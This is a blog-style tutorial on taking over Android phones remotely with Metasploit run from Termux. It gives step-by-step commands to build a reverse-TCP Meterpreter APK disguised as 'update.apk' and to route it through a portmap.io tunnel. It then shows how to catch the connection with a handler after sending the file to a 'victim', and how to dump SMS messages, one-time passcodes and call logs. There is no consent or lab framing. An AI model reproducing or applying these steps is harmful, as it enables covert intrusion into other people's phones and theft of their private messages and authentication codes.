Banner ads

metasploit android hacking over wan

metasploit android hacking over wan - Hi guys if you are searching for metasploit android hacking over wan and searching for the best article to get the best explanation about metasploit android hacking over wan. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "metasploit android hacking over wan". By this article, you can get a lot of about metasploit app download for android, how to hack other phones camera, port forwarding guide. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.


metasploit android hacking over wan
metasploit android hacking over wan


metasploit android hacking over wan

Hello, guy's I am back with another amazing post so today we get to know about how to create and hack any android over the wan (anywhere in the world) by Metasploit framework in termux without any issue by simple steps so guy's by this method you can hack any thing in target device like Contacts, Sms, Call history, Screen, Location, etc. So guy's now it's time to go through the practical part of metasploit over wan.



#Follow below step's

1Install termux and update and upgrade it

$ pkg install php -y

$ pkg install git -y


$ pkg install python -y


$ pkg install perl -y


$ pkg install python2 -y


$ pkg install ruby -y


$ cd $HOME


$ git clone https://github.com/noob-hackers/m-wiz


#STEP 1 (METASPLOIT INSTALLATION NO ROOT)

This script will install Metasploit framework in your termux app so you need some requirements to use Metasploit in termux


> Good internet connection

> 1 Gb of internet
> 2 Gb of storage
> Stable android device version not below then 4.0.0
> Patience

After completing all requirements you can go ahead for the installation of Metasploit in termux.


$ ls


$ cd m-wiz


$ bash m-wiz.sh


Now here in script menu select option 1 to install Metasploit framework in termux and after a 30 seconds process will be shown and after that, a version selection menu will have appeared and in that select, you devise version and click on enter in keyboard and wait for at least 1 hour or 1:30 hour it depends on your android device so I recommend you to stay away from the device until the Metasploit installs properly. So take a walk outside till it installs :)


#STEP 2 (METASPLOIT CONSOLE OPENING)


After the successful installation Metasploit will automatically be opened in the same session if it doesn't then follow the below step. if you are using (6.0.0) version based device


$ cd ..


$ ls


$ cd usr


$ cd opt


$ cd metasploit-framework


$ ./msfconsole


Or 


$ msfconsole


Now from here the Metasploit console will be opened if it doesn't then repair Metasploit from the m-wiz tool it will solve the issue...


#STEP 3 (CREATING PAYLOAD AND HACKING TARGET)


1. First open chrome browser and enable desktop mode by tapping three dots on top right side of the browser and enable desktop mode after that open portmap.io website after website opened just register on that and sign in after all the login process on top of the website you can see a CONFIGURATION click on that and after that a new window open in that you can see 4 small boxes in 1 box you can add any name, in 2nd box select OPEN VPN, in 3rd box select TCP after that, leave the 4th box don't touch it...


Now after that you can see GENERATE at the end of the page just click on the download button and download automatically starts now here you can see a small file that has been downloaded.


2. Now at the end of the same page you can see the CREATE button just click on that ...


3. After that at the top of the web you can see MAPPING RULES just click on it, after that a new window opens, and in that just add any 5 digit number in the place PORT ON YOUR PC after that click on CREATE.


4. Now go to play store and search OPEN VPN FOR ANDROID and download it after that open app and at the top right side you can see Import BUTTON now click on that and select ex:- (xuberpack.first.ovpn) this type of file in your storage and after that click the RIGHT button on the top right side and after that you can see the home page of the app now just click on the (xuberpack.first.ovpn) a new message arrives and asks you to allow now allow that by clicking OK after that a tunnel starts.


5. Now open portmap.io web in chrome and you can see a tunnel which you created now in that copy these things


Ex :- hulkbro-35272.portmap.host and The Port number Ex:- 35272



Ex:-./msfvenom -p android/meterpreter/reverse_tcp LHOST=xuberpack.35272.portmap.host LPORT=35272 R > /sdcard/update.apk

#STEP 4 (EXPLOITING LAST STEP)


Open termux and follow below commands.


$ cd $HOME


$ ls


$ cd metasploit-framework


$ ./msfvenom -p android/meterpreter/reverse_tcp LHOST=xuberpack-35272.portmap.host LPORT=35272 R > /sdcard/update.apk


Wait until payload get ready ....after that follow this (open 2nd session)


$ cd $HOME/metasploit-framework


$ ./msfconsole


now open new (3rd) session and apply these commands


pg_ctl -D $PREFIX/var/lib/postgresql start


now come back to (2nd session) in which you opened Metasploit now apply these commands.


$ db_status


$ use exploit/multi/handler


$ set payload android/meterpreter/reverse_tcp


$ set lhost xuberpack-35272.portmap.host


$ set lport (the port you wrote in computer port number)


$ exploit


(Don't forget to turn on Open Vpn or else you won't get session)


Now go to your internal storage and search the payload (update.apk) which you have been created now send this to your victim mobile and let him open it .. now the work has been done you can see the session started message now you can do whatever you like to do ......


#STEP 6 (HACKING DETAILS AFTER METERPRETER SESSION)


Now when you get meterpreter session of your victim device follow the below steps to get his info.


Ex :-


meterpreter> help


(Now here all the commands to dump data will be shown now use them according to you needs for example.)


meterpreter > dump_sms


This command gets all our victims mobile SMS and OTP's and it will be saved in .txt formate like sms5563543bbfbbff.txt 


Like this you can fetch and save many things as I said in the beginning of this post and to see saved or fetched data.


$ cd $HOME/metasploit-framework


$ ls


Here, you will get all the saved .txt call logs and information and etc... to see that


$ cat calllogs586464dec564.txt


This will show all info in script formate. So guys that's all for today so I hope you liked this one.



how to use metasploit in termux in pdf version

English ----> Click Here 
Kannada ----> Click Here
Tamil ----> Click Here
Urdu ----> Click Here
Hindi ----> Click Here



 websites I used in the video

Click Here


watch the practical video here ( part 1 )

Click Here

watch the practical video here ( part 2 )

Click Here

watch the practical video here ( part 3 )

Click Here

watch the practical video here ( part 4 )

Click Here

watch the practical video here ( part 5 )

watch the practical video here ( part 6 )

Click Here

watch the practical video here ( part 7 )

Click Here



 Follow this carefully
Please don't skip the video ...
So guys follow the steps as I showed from starting of the video to the end of the video ok. So after all, if you are facing any problem then comment or use contact us page, please........

Errors or issue reasons


  • Command error 

  • Data connection problem 

  • Big letters using in commands 

  • Giving more space b/n words 

  • lack of patience


    "Solution for all these problems is watching a video without skip until the end"

    Link for video will be available below
    Click On Below Button

    Post a Comment

    0 Comments